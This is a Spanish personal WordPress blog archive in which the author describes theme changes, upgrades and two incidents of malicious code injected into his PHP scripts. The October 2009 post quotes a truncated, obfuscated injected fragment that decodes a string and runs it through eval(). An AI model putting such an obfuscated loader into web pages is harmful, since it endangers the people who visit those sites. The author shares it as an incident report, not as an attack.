You are browsing the Blog for WordPress.

¿Alguien me lo explica…? (Off topic)

octubre 4, 2009 en Entrada Diario

Hola:

¿Sabeis como se llama el siguiente fragmento de codigo?

[...]+escape(vZ29+Z27;expiZ72eZ73Z3dZ27+exd.toGZ4dTZ53tZ72inZ67();Z7d;”;XXXXX for(i=0;i<s.length;i++){if(s.charAt(i)==”Z”){s1=”%”}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z());

Se llama “Tocar los cojones”, hablando en plata. Os he remarcado en negrita la función que finalmente es ejecutada. Sin comentarios…

Creo que no hacen falta demasiadas palabras (es un fragmento de codigo que ha sido añadido a varios scripts de php de los blogs de mi dominio, aprovechando alguna vulnerabilidad de php y wordpress). Llevo ya toda la mañana perdida en resolver este problema, cuando la tenía reservada para continuar las entradas del blog. Podría dar la impresión de que a las personas que nos gusta escribir y compartir conocimientos, nos sobra precisamente tiempo y podemos malgastarlo en resolver dia a día las fallas de seguridad: estar continuamente pendiente de actualizar a la ultima versión (en mi caso de wordpress). Detectar los ficheros que han sido alterados con scripts similares al que os expongo al principio del post, recoger nuevos pluggins que nos permitan evaluar la seguridad del sistema, preparar scripts para monitorizar el cambio de ficheros, etc…

Y no es ya que pueda ser alterado un script de php, que puede ser cuestion de minutos localizarlo y borrar las lineas añadidas. Eso es un poco lo de menos. Es que a menudo no cambia uno, sino que tienes revisar en todos los directorios que dan acceso a las bitacoras y si deseas actualizar las versiones, tienes que hacerlo con todas ellas. Y revisar los permisos de los ficheros. Por lo que, teniendo en cuenta de que ninguno de los blogs que se encuentran alojados tiene un caracter comercial sino personal, de los que no se tiene absolutamente (y lo digo con mayusculas) ningun rendimiento económico, resulta un tanto surrealista que tengamo que dedicar nuestro tiempo a la seguridad, no ya para que pueda ser alterado el contenido del blog sino para que no puedan ser dañados los equipos de las personas que puedan visitar las páginas, que es lo que realmente a mi mas me preocupa. El contenido del blog pueden dañarlo pero existen copias de seguridad que pueden en condiciones normales ser restauradas. Pero ¿y las personas que acceden al blog?

¿Cual es la ganancia de todo este disparate?

Si alguien lo entiende que me lo explique porque yo no he llegado a entenderlo.  :-(

Etiquetas: , , ,
Comentarios desactivados

¿Ya se puede ver la página? :-)

julio 9, 2009 en Consejo, Entrada Diario

A las personas confiadas, habitualmente le suceden problemas propios de esa ingenuidad.  :-)

El caso es que hoy he tenido un pequeño problema con el blog porque alguien se ha entretenido en inyectar codigo malicioso en uno de los scripts que inician la carga. Por lo que he tenido que dedicar un rato a ver cual era el problema y tras contactar con el proveedor del alojamiento, se ha solucionado en un plis plas. En ese sentido, siempre he valorado como muy bueno el soporte de Dinahosting y tras varios años alojando la pagina en sus servidores no me han dado un solo motivo para pensar en elegir otro. Todo lo contrario.

Que le pasen a uno estas cosas es hasta cierto punto bueno. Los blogs siguen teniendo problemas de seguridad; y habilitar el administrador del blogs para la modificación tanto de las hojas de estilo como de scripts php propios del tema, etc…, puede dejar una puerta abierta a que se pueda sobrescribir algun que otro archivo. Es bueno que le pasen a uno estas cosas pero cansa.

Lo peor de todo, es que el tiempo ese que dedicas a revisar que nadie pueda alterar maliciosamente el contenido se lo estás quitando a las personas que lo han podido encontrar válido y a los que has podido en algun momento ser de ayuda. Yo no saco nada de mantener el blog. Absolutamente nada. No hay ni un solo ingreso economico ni nunca lo habrá, con independencia de que tenga 3000 visitas al mes o 300000.  Cada uno tiene sus ideas. y desde principio fue así y  si no puede ser, porque llegue un momento en el que no lo pueda mantener, pues seguro que cualquiera de los amigos y compañeros que he podido tener no tendran problema en alojar su contenido. Aunque no se vea ni se valore, mantener actualizado el contenido es una tarea que te saca muchas horas semanales, y se hace aun cuando se las tenemos que quitarselas a otras areas personales.

En fin, no veo que gana nadie dañando el blog. Ni este ni otros muchos…

El espiritu de los desarrolladores es el de construir. Solo destruimos para generar un proyecto mejor.

Etiquetas: , ,
3 Comentarios »

Cerrando temas…

abril 19, 2009 en Entrada Diario

Nada mas sensato que ir cerrando temas. Así que me he centrado en la actualización del blog, tanto en la parte de recuperar los elementos que ya existían como en algunos nuevos que tenemos disponibles ahora.

En estas últimas horas he vuelto a situar en la barra lateral por ejemplo, el traductor de Google, que permitía a las personas que visitan la pagina traducirla a otros idiomas fácilmente; el enlace a mi cuenta de contacto (correo y messenger), y las distintas listas que ya existían en la barra lateral, y que permitían acceder a las entradas bien ordenadas por categorías, bien a través de la enumeración de que exista al final de la barra lateral. Bueno… Y los dos banners que aparecen como muestra de solidaridad.

La nueva versión además ya incorpora lo que se llama “Nube de etiquetas”, tan de moda en estos días. Eso sí, me supone bastante trabajo repasar cada una de las entradas, una por una, e ir marcando las distintas etiquetas. Si eso se hace a medida que se escribe es una rutina mas. Si como ahora hay que volver a releer las entradas y extraer las palabras claves pues cuesta un “poquillo” mas… :-) Es un trabajo que tengo a medias por lo que no están todavía todas las entradas clasificadas. Y contamos tambien con una mejora adicional que es la existencia en este tema de un buscador de contenido, que antes no existía y que ahora permitirá buscar con mas precisión.

La versión de WordPress es la 2.71 y nos trae también muchas mejoras en el administrador del blog, así como en la gestión de contenido, tanto a nivel de interfaz como de usabilidad. No tiene nada que ver con la versión que estaba usando hasta estos días, en que me decidí a cambiarla.

Respecto a lo que falta… efectivamente falta todavía recuperar algunas cosas, a nivel de diseño del blog casi todas. Muchos logos o imagenes que ahora mismo no se como encajar. El espacio para los videos destacados tampoco tengo muy claro donde ponerlo. Las imagenes o avatares que acompañaban a las distintas categorias y que permitían identificar el tema central del articulo de forma visual y bastante eficaz y rápida. Y algún detalle menor que se que está por ahí pero que ahora mismo no me viene a la cabeza. Todo se andará con paciencia.

Tiempo al tiempo… ;-)

Etiquetas: ,
Comentarios desactivados

Actualizacion de WordPress

abril 17, 2009 en Entrada Diario

Esta noche, tras muchos días sopesando los pros y los contras, me he decidido finalmente a actualizar la versión del WordPress, consciente de que a pesar de que se presumía como una tarea sencilla, por cuanto es un proceso bastante automatizado, en la medida que había personalizado el tema, iba a encontrar algún problema. Y de hecho, así ha sido. :-(

Así que os pido perdón de antemano si han desaparecido algunas características que pudisteis encontrar utiles en la versión anterior. Y sobretodo que tengais paciencia. No parece existir una compatibilidad completa en cuanto al tema y he tenido que desactivarlo, ante las rupturas de codigo que se hacían visibles. No obstante, creo que va a ser un cambio positivo a medio plazo ya que me permitirá activar algunos plugins y widgets que pueden sernos utililes, y que no tenía disponible en la versión anterior.

Y ya para acabar, también quiero aprovechar esta entrada para compartir con vosotros un dato objetivo, y es que poco a poco crece el numero de personas que visita la página y que la lee. Es bajo si lo comparamos con otras, pero no es algo que me quite el sueño, ni es tampoco mi interés el que existan mas visitantes con un mero motivo de especular economicamente.
Segun el contador de Webstats hemos pasado de 4.121 paginas vistas en el año 2006, 12.011 en el año 2007, 16.686 en el año 2008 y en este que estamos, ya llevamos mas de 5.000 paginas vistas. Existe un enlace al final de la página por si os apetece verlo.
http://webstats.motigo.com/s?tab=1&link=2&id=2497982

Etiquetas: , ,
Comentarios desactivados

Nuevo tema de WordPress para el blog

diciembre 15, 2007 en Delphi, Entrada Diario, Velneo

Os pido disculpas si en estos proximos días encontrais algunos problemas con el tema de presentación del blog.

A raiz de algunos comentarios de compañeros, que me han parecido acertados, he decidido cambiar el tema que actualmente tenia seleccionado en el blog, con el fin de mejorar algunos puntos que me daban problemas.

El motivo principal es la necesidad de que la barra lateral quede a la izquierda, en lugar de ubicarse a la derecha para así ganar mayor espacio en la parte de contenido. En el anterior tema tenía el problema del espacio reducido que ocasionaba, de ser insertada una imagen mayor que éste, se perdia la estetica de la página, ya que la barra lateral se desubicaba hacia el fondo de la misma. Este cambio nos permitirá incluir mayor tamaño de imagenes y lo mas importante que, en el caso de incluir algun video de ayuda, pueda quedar insertado en la misma entrada, en lugar de tener que generar una ventana adicional como me sucede actualmente.

En fin… he seleccionado otro tema en el que la barra queda a la derecha, pero ahora debo volver a rehacer todos los cambios que hice manualmente en los scripts de php para que mejorase un tanto el aspecto. Poco a poco, ire restaurando las imagenes de la cabecera y resto de iconos informativos del post.

Creo que es una buena forma de dar la bienvenida al año 2008. Nuevo año, nuevo aspecto, nuevas ilusiones…

:-)

Etiquetas: , ,
Comentarios desactivados

Cambio de tema…

junio 9, 2006 en Entrada Diario

El sistema de WordPress que mantiene estas páginas permite cambiar las presentación de cada blog tan solo seleccionando la opción correspondiente. Así que tras pensarlo y valorarlo durante unos días, he creido conveniente cambiar el “Thema”. Me daba “penita” porque había pasado algunas horas incrustando la imagen del templete que representaba a Delphi sobre el motivo original de la hoja. Y los colores eran más cálidos que este gélido blanco.

No obstante, el blog tenía desactivadas las opciones de búsqueda y pensaba finalmente, que el tenerlas activas justificaba el cambio. Así que la elección del fondo blanco responde a facilitar la lectura, si es que alguien lo encuentra finalmente de interes… :-)

Hoy no tengo demasiado que decir. Ha sido un día tranquilo, que he dedicado a leer y profundizar sobre algunos temas. La escritura del artículo me ha abierto algunas inquietudes que estoy intentando satisfacer en los ratos que dispongo algo de tiempo. He dedicado parte de la mañana a esa tarea en las horas en las que el tibio sol se colaba por la ventana de mi escritorio, y algo mas tarde, cuando ya estaba cercana la hora de la comida, he leido un par de capítulos del último libro que compré. Y poco más.

Un día ciertamente tranquilo.

Etiquetas: , ,
Comentarios desactivados